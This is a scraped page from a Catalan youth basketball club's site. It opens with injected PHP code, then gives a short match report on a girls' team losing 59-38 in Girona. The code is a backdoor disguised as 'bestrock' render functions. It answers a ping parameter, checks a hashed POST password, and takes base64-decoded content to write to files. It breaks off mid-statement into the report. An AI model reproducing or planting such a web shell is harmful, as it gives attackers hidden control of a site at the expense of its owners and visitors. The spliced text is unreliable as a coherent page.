function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La davallada defensiva del preinfantil femení A provoca la derrota contra el GEiEG Uni Girona (59-38) - Tgn Bàsquet Club -

La davallada defensiva del preinfantil femení A provoca la derrota contra el GEiEG Uni Girona (59-38)

Updated: desembre 4, 2018

L’equip preinfantil femení A va perdre a la pista del GEiEG Uni Girona en un partit que es va començar a decantar cap el bàndol local en el segon quart. Així, després d’un bon inici lila, amb una defensa intensa, només les errades en tirs còmodes sota el cèrcol van impedir el TGN Bàsquet dominar en el marcador. En el segon quart, però, la davallada en el rendiment defensiu de l’equip van permetre les locals arribar al descans amb un avantatge clar (31-19). Les visitants no es van donar per vençudes però a falta de sis minuts pel final i amb un resultat de 45-36, el GEiEG va prémer l’accelerador i va trencar definitivament el matx.